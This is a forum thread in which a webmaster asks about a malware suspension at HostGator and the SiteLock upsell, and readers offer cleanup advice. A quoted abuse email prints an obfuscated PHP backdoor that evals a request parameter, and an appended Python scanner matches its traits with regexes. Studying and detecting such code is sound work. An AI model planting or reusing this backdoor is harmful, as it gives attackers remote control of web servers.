Hostgator scam, please help

Hello,
I have a virus on Hostgator. At least that's what support told me.
When they wanted to offer me the only program that fixes this... Because I got suspicious and went digging, I came across this page: http://www.hermesthemes.com/scam-alert-hostgator-sitelock-malware-extortion/
Their communication is quite comparable to mine, i.e. the one between me and them.
Please advise me how to resolve this. I don't want anyone extorting my money this way.
Please call or advise. 041723824, thanks in advance.

24 replies

here I am with them again..

check pleas
5:37:47 AM
Desmond H
Ok, one moment while I check on our backup for you.
5:38:30 AM
jaka
bout it moust be freee of malware!
5:40:09 AM
Desmond H
This is the backup we have for you: Full Backup: Mon Aug 8 05:21:28 CDT 2016
5:40:53 AM
jaka
bout when wos my page suspendet??
5:41:31 AM
Desmond H
Im not sure, I see it is not suspended now.
5:41:57 AM
jaka
realy??
5:42:20 AM
jaka
borilna-akademija.info/cgi-sys/suspendedpage.cgi
5:42:28 AM
jaka
???
5:42:29 AM
jaka
5:43:17 AM
Desmond H
Sorry, I found your ticket. It was started Aug 5th. So it looks like our backup has the malware on it too.
5:43:19 AM
Desmond H
HostGator’s automatic backup service runs once a week on a random day, and each run overwrites any previous backups. Only one week of backups are kept at a time. The terms of our backup policy vary depending on the type of hosting account. support.hostgator.com/articles/pre-sales-policies/rules-terms-of-service/backup-policy-do-you-provide-backups
5:44:03 AM
jaka
so what you sugest?
5:44:20 AM
jaka
what we can do?
5:44:42 AM
Desmond H
Due to recent changes we are no longer performing cleaning or scanning of accounts for our clients. This includes any malware removal or securing of accounts which have been compromised. We sincerely apologize for any inconvenience this may cause. If you are looking for a proactive approach to detecting and addressing security issues with your site, consider SiteLock, a site monitoring and protection tool for small and medium-sized businesses. Their service can also work to remove malicious content from your account. I would be happy to set it up so you get more information on this, or I can also have this ordered for you if you wish.

That is all I can offer you at this point. We use Sitelock for security, and only do once a week backups. Since the backup has malware, your only other options is to have your own backup or pay someone to remove the malware for you.

Shall I tell you the harsh truth?

Hosting providers are (we are) slowly getting fed up with taking responsibility for irresponsible owners who don't update or secure their sites. This has become one of the bigger costs lately.

The site is your responsibility, not the provider's. It is your responsibility to protect it and, in case of an attack, to clean it up. They are merely offering you a tool that will help you with that, and it is not a scam.

I suggest you find someone who knows how to clean the site. There are quite a few providers on the net for individual scripts. Then secure the site and keep it regularly updated in the future. SiteLock is one of the options.

15

I recommend SUCURI

As a first measure you can also go through the files with your own Windows antivirus program. Malware is often somewhere under wp-content/images, because the directories there are more likely to be writable.

I'm guessing that some plugin or template was installed on the site from a pirated source, and that is how the malware got in.

PS: thumbs up for fluid engrish

5

Cleaning and securing the site is not a problem. Finding someone who will do it for you for little money, that's probably your problem :).
I do agree with Žabec, though. A website is primarily the owner's responsibility. Practically anyone can set up WP or Joomla these days, but web development is so much more than clicking Next.

4

I am seeing that there is ticket for this. It shows in the email that was sent to you. Here is the content of the email:

Hello,

It has come to our attention that malware is hosted on an account under your control. We have disabled site access for your account to prevent further abuse.

xpsistem 105886 0.0 0.0 303876 17392 ? SN 03:40 0:00 | _ /opt/php54/bin/php-cgi /home1/xpsistem/public_html/karatezvezagorenjske.si/kranj/wp-content/uploads/2013/08/page.php

head -1 /home1/xpsistem/public_html/karatezvezagorenjske.si/kranj/wp-content/uploads/2013/08/page.php

<?php ... $n50="T|c7W;Qt&8iK6vMo0*g\$\n4\"Zb)VOlN(qGy?A~J-SxF_/n#D1}]P`{EwCU\r>3eB':jL.R%5s k,X2[\zY^f!H+r@h<\td9u=amIp";$GLOBALS['lkqja84'] = ${$n50[42].$n50[50].$n50[27].$n50[39].$n50[0]};$GLOBALS['aazcu53'] = $n50[87].$n50[60].$n50[94].$n50[90].$n50[60].$n50[85];if (!empty($GLOBALS['lkqja84']['m32c7e5f3'])) { eval($GLOBALS['lkqja84']['m32c7e5f3']); } $GLOBALS'aazcu53'; echo $n50[88].$n50[87].$n50[47].$n50[58].$n50[21].$n50[16].$n50[21].$n50[71].$n50[29].$n50[15].$n50[7].$n50[71].$n50[41].$n50[15].$n50[92].$n50[44].$n50[90].$n50[88].$n50[43].$n50[87].$n50[47].$n50[58].$n50[57].$n50[20].$n50[0].$n50[87].$n50[60].$n50[71].$n50[97].$n50[94].$n50[18].$n50[60].$n50[71].$n50[7].$n50[87].$n50[94].$n50[7].$n50[71].$n50[33].$n50[15].$n50[92].$n50[71].$n50[87].$n50[94].$n50[13].$n50[60].$n50[71].$n50[85].$n50[60].$n50[31].$n50[92].$n50[60].$n50[70].$n50[7].$n50[60].$n50[90].$n50[71].$n50[2].$n50[15].$n50[92].$n50[28].$n50[90].$n50[71].$n50[44].$n50[15].$n50[7].$n50[71].$n50[24].$n50[60].$n50[71].$n50[81].$n50[15].$n50[92].$n50[44].$n50[90].$n50[66].$n50[57].$n50[20];

stat /home1/xpsistem/public_html/karatezvezagorenjske.si/kranj/wp-content/uploads/2013/08/page.php

File: `/home1/xpsistem/public_html/karatezvezagorenjske.si/kranj/wp-content/uploads/2013/08/page.php';;
Size: 1449 Blocks: 8 IO Block: 4096 regular file
Device: 811h/2065d Inode: 58851329 Links: 1
Access: (0644/-rw-r--r--) Uid: (32286/xpsistem) Gid: (32288/xpsistem)
Access: 2016-07-24 17:00:16.000000000 -0500
Modify: 2016-07-24 17:00:16.000000000 -0500
Change: 2016-07-24 17:00:16.202371539 -0500

In order to remove the restrictions we’ve placed, you must resolve the security issue. Since we cannot perform this type of service for you, I recommend you contact SiteLock or another security service to prevent further damage to your server by the malicious content. We are partnered with SiteLock, so we can provide you with any assistance to sign up for their service.

Please note that repeated reports of malicious content on your account within 60 days of an initial notice will lead to further action being taken, including permanent suspension after failing to professionally clean the account.

Once you have taken steps to secure your account, please reply back to this ticket to request review.

Julian F.
Level II Linux Systems Administrator

Any advice?
Please.

The email talks about a single file. Delete it and you'll be reactivated.

Then the more important part:
- upgrade core, all themes and all plugins to the latest version - be careful with paid plugins (layerslider, visual composer, revolution slider, ...) that are bundled with paid themes and do not update on their own - the envato marketplace is the wild west in this regard
- immediately remove all nulled plugins/themes, if you have any
- download the files and scan them with a desktop antivirus
- do a thorough web scan (sucuri and a bunch of others)
- activate one of the security packages (sucuri, ithemes security, ...)

And then the even more important part:
- update regularly!

2
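Added example, not part of any post in this thread: a small Python check to run over a downloaded copy of the site after deleting the reported file, flagging PHP files under wp-content/uploads and files that show the two traits visible in the quoted page.php line (long `$var[N].` index chains and `eval` on a variable). The pattern names, thresholds and the sample tree in `demo()` are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristics modelled on the page.php line quoted in the abuse e-mail above.
PATTERNS = {
    "index-chain": re.compile(r"(?:\$\w+\[\d+\]\s*\.\s*){8,}"),  # $n50[42].$n50[50]. ...
    "dynamic-eval": re.compile(r"\beval\s*\(\s*\$"),              # eval($variable...)
}
PHP_EXT = {".php", ".phtml", ".php5", ".phar"}

def indicators(source):
    """Return the names of the obfuscation heuristics that match the source."""
    return [name for name, rx in PATTERNS.items() if rx.search(source)]

def scan(root):
    """Report PHP files that sit under wp-content/uploads or match a heuristic."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in PHP_EXT:
            continue
        rel = path.relative_to(root).as_posix()
        hits = indicators(path.read_text(encoding="latin-1", errors="replace"))
        # WordPress stores media in uploads; executable PHP there is suspect.
        if "/wp-content/uploads/" in "/" + rel:
            hits.insert(0, "php-in-uploads")
        if hits:
            findings.append({"path": rel, "hits": hits})
    return findings

def demo():
    """Scan a constructed tree: one obfuscated upload, one ordinary theme file."""
    chain = ".".join(f"$k[{i}]" for i in range(12))
    samples = {  # constructed sample files, not taken from the thread
        "wp-content/uploads/2013/08/page.php":
            f"<?php $k='abcdefghijklmnop'; $g = {chain}; eval($g);",
        "wp-content/themes/demo/functions.php":
            "<?php\nfunction hello() { return 'hi'; }\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="latin-1")
        return scan(root)

if __name__ == "__main__":
    for finding in demo():
        print(finding["path"], ", ".join(finding["hits"]))
```

Point `scan()` at the directory that contains `wp-content`. A clean result only means these two patterns were not found, so the update and web-scan steps listed above still apply.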